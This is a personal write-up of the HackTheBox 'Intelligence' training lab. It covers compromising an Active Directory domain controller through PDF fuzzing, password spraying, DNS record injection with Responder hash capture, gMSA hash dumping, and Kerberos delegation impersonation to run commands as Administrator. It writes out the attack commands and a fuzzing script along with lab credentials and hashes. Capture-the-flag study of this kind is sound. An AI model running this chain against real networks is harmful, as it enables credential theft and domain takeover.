Intelligence — Hackthebox walkthrough
Intelligence from hackthebox was a medium rated box by @Micah. Actually, for me it was quit hard since I am an absolute beginner when it comes to Active Directory.
User
Just like always, I started with my nmap.
nmap -p- -sC -sV -A — min-rate=400 — min-parallelism=512 -v 10.10.10.248
The minute I saw DNS , LDAP and Kerberos were open, I knew this was going to be an Active Directory box. First of all, I checked out the HTTP server.
I saw a domain name called ‘dc.intelligence.htb’ in my nmap script scan results. So I added that entry to my /etc/hosts file.
sudo echo “10.10.10.248 dc.intelligence.htb” >> /etc/hosts
I went to see what it looked like.
I really did not know what this paragraph said, I tried translating it but it was nothing important.After doing my normal enumeration, I found two PDF files that I could download.
So I downloaded those and looked what they were. And it was nothing I could understand. But since this was a PDF file, I tried looking at it’s meta data with exiftool
exiftool 2020–01–01-upload.pdf
Here I saw a field called creator. That’s nothing common to have. So I knew this should be some kind of an user in the box. With these two files, I got two users as ‘William.Lee’ and ‘Jose.Williams’.
I tried brute forcing SMB and LDAP with these usernames and password lists I thought may help but no luck. So all these were for nothing ?
I tried enumerating DNS and LDAP as well. Again those were busts too. Since I was at a dead end, I took my eyes back to my nmap and started all over. When I was going through the HTTP server for the second time, I saw a very interesting thing.
The PDF files were saved with the date that this was uploaded. So I tried to see if there are any other PDF files I could access by changing the date at the URL.
And yes I can. With this I knew I had to do some kind of fuzzing to get all the PDF files. For that I made two files as days and months containing days from 1–31 and months from 1–12
seq 1 31 > days; seq 1 12 > months
Then I manually added zeros to the start of the numbers from 1–9 as I saw on the URL.
As always, since I am a kind of a python person, I made a little python script to fuzz and download all the PDF files for me.
#!/usr/bin/python3
# Author: kavigihan
import requests
import os
def fuzz_PDFs():
with open(‘days’, ‘r’) as d:
days = d.readlines()
with open(‘months’ ,’r’) as m:
months = m.readlines()
url_file = open(‘urls’, ‘w’)
url_file.close()
for month in months:
for day in days:
r = requests.get(f’http://dc.intelligence.htb/documents/2020-{day.strip()}-{month.strip()}-upload.pdf')
if int(r.status_code) == 200:
print(f’http://dc.intelligence.htb/documents/2020-{day.strip()}-{month.strip()}-upload.pdf')
with open(‘urls’, ‘a’) as url_file:url_file.write(f’http://dc.intelligence.htb/documents/2020-{day.strip()}-{month.strip()}-upload.pdf')
url_file.write(‘\n’)
def get_PDFs():
with open(‘urls’, ‘r’) as u:
urls = u.readlines()
for url in urls:
os.system(f”wget -q {url.strip()} “)
print(f’[+] Downloading — {url.strip()} ‘)
fuzz_PDFs()
get_PDFs()
This is not the best but it works. You can find this script on my GitHub as well.
https://github.com/kavishkagihan/Hackthebox-walkthroughs/blob/main/Intelligence
With this, I was able to fuzz and download all the PDF files on the server.
After this, instead of using exiftool, I ran strings on all these files and extracted all the usernames.
cat *.pdf|strings |grep Creator|cut -d ‘(‘ -f 2|cut -d ‘)’ -f 1|grep -v TeX > users;cat users
After, I looked all the PDF files and guess what I found.
I got a password of ‘NewIntelligenceCorpUser9876’ from 2020–06–04-upload.pdf file. Having these, pointed me towards SMB. So I used crackmapexec to brute force the username for this password with the username list I had.
crackmapexec smb 10.10.10.248 -u users -p “NewIntelligenceCorpUser9876”
And I got a valid username for this password.
username — Tiffany.Molina
password — NewIntelligenceCorpUser9876
Root
Since I had credentials, I logged in to SMB as Tiffany.
smbclient -L //10.10.10.248 -U Tiffany.Molina
So I enumerated these shares I found and I saw downdetector.ps1 in the IT share. So I downloaded it and tried to understand what it does.
So what this does is that, it checks for any DNS records for domain intelligence.htb which starts with “web” and send a HTTP request for each of the found domains using the credentials of Ted. (with -UseDefaultCredentials option) And then a mail is sent to Ted if the server doesn’t return 200 OK status code.
What I did was I used dnstools.py to add a fake VHOST that doesn’t exist starting with web to the zone . This will trigger the script and send a mail to Ted.
command — python3 dnstool.py -u ‘intelligence.htb\Tiffany.Molina’ -p NewIntelligenceCorpUser9876 -a add -r webfakedomain.intelligence.htb — data 10.10.114.179 10.10.10.248
Since this script is sending an email to himself, I used responder to sniff and get the password hash of the Ted user.
responder -I tun0 -A
What this does is that when the authentication happens with kerberose, responder will perform a MITM attack and get the password hash (just a very simple overview)
I cracked this hash with hashcat and got a password for Ted user.
command — hashcat -m 5600 — force hashes\hash.txt wordlists\rockyou.txt
Since I had control of Ted user’s account, I mounted the User share as Ted and started enumerating.
mkdir mount ;sudo mount //10.10.10.248/Users mount/ -o username="Ted.Graves",password="Mr.Teddy"
But unfortunately, couldn’t find anything. No config files, no interesting processors running. Nothing !! So I took a step back and saw what I was missing.
I did almost every thing again, then I figured out that I had missed one PDF file. ‘2020–12–30-upload.pdf’ . So I took a look at that.
So this is saying that they have not locked down the service accounts yet. I searched about service accounts for a while and found out that we can dump hashes with gMSADumper.py, if the service accounts are enabled. (correct me if I am wrong)
So I used this method to get the NThash of the svc_int account.
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
With this I knew I could do, what they call a “Pass The Ticket” (PTT) attack. For that, I tried to sync the time with the box with ntpdate.
ntpdate 10.10.10.248
When I was initially doing this, ntpdate didn’t work for me. This may work for you, but in my case it didn’t.
It would set the time but it automatically changed to my time zone’s time in few seconds. So what I did was I used a bit of bash and ran this in a loop so that I can keep the time set without getting changed.
while [ 1 ]; do sudo ntpdate 10.10.10.248;done
While I was running this I used getST.py to get a service ticket impersonating Administrator so that I can run commands as that user later on.
getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate administrator
What this attack really does is that, first we use our(Ted’s) hash to authenticate. After what usually happens is that kerberose server will send a ticket for the user we specify. But instead, here we are saying that in return we need Administrators ticket not Ted’s one.(with “-impersonate administrator” )
As you can see the ticket was saved as administrator.ccache. With this ticket you can use various tools to get command execution. But since I knew that RPC was there I used atexec.py.
The atexec.py script form Impacket helps an attacker to access the victim host machine remotely through DCE/RPC based protocol.
So I exported the ticket I got as an envirnomaent variable(defulat one is KRB5CCNAME).
export KRB5CCNAME=administrator.ccache
And then used atexec.py to execute commands by telling it to use the administrator.ccache file. (with -k option)
atexec.py -k -no-pass dc.intelligence.htb ‘whoami’
Rooted !!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄
